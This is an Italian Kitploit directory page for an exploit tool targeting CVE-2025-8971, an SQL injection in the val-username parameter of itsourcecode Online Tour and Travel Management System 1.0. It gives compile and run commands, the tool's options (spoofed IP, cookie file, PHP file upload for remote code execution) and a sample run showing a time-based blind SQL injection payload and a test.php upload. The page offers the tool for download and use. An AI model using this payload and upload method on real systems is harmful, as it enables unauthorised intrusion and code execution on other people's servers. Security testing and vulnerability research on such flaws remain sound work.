Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8971 — Iniezione SQL in itsourcecode Online Tour and Travel Management System 1.0. | Kitploit
Strumenti/GitHubGitHub/bytereaper77/cve-2025-8971
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingArchived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

Iniezione SQL in itsourcecode Online Tour and Travel Management System 1.0.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8971 (SQL Injection)

Autore: Byte Reaper

Descrizione :

Questo exploit per CVE-2025-8971, una vulnerabilità di SQL injection in itsourcecode Online Tour and Travel Management System 1.0. La vulnerabilità risiede in /admin/operations/travellers.php e può essere sfruttata da remoto tramite il parametro val-username.

Come funziona

L'exploit invia richieste HTTP POST appositamente create all'URL di destinazione.

I payload sono codificati e iniettati in val-username.

Il caricamento facoltativo di file (.php o immagine) può essere utilizzato per ottenere l'esecuzione remota di codice.

Lo script verifica le risposte per controllare se il payload è stato eseguito con successo.

Requisiti :

root@kitploit:~
GCC compiler (gcc)

Linux x86_64 

ibcurl 

Compilazione :

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]

Utilizzo:

root@kitploit:~
    -h, --help            help message 
    -u, --url             Target Url (BASE URL)
    -c, --cookies         File cookies
    -i, --ip              Fake Ip (Host request)
    -f, --file            File upload (.php / image)
    -v, --verbose         Verbose Mode

Esempio di esecuzione :

root@kitploit:~
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....

Licenza :

Licenza MIT

Scarica lo strumento